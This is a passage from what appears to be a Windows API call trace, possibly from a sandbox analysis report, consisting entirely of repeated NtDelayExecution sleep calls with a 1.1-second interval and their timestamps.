(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0135.775] NtDelayExecution 